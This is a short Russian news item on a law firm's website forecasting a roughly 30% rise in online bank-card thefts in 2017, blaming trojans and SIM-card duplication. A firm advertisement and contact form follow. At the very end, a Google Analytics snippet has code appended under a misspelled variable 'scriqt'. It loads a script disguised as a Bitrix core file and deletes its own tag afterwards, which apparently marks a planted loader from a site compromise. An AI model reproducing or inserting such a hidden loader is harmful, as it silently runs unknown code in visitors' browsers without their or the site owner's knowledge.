СМИ: Число интернет-краж с банковских карт может вырасти на треть в 2017 году.

СМИ: Число интернет-краж с банковских карт может вырасти на треть в 2017 году. Эксперты пришли к выводу, что россияне пока не научились соблюдать элементарные правила финансовой безопасности в Интернете.
В 2017 году число сетевых краж с банковских карт может вырасти на 30%.
По данным СМИ, в 2016 году число интернет-краж с банковских карт из-за халатности их владельцев достигло 107 тысяч случаев — это на 43 и 78% больше, чем в 2015 и 2014 годах соответственно. Прогнозы на 2017 год неутешительны: рост может достигнуть 30%, а число краж — 135–140 тысяч случаев. Выводы сделаны на основе опроса ста крупнейших банков.
Аналитики установили, что мошенники чаще всего атакуют компьютеры с помощью вирусов-троянов и получают дубликаты SIM-карт, на которые приходят одноразовые пароли для подтверждения операций, — говорится в публикации. Дополнительные риски, по мнению экспертов, создаёт и активное использование смартфонов для входа в личный кабинет.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');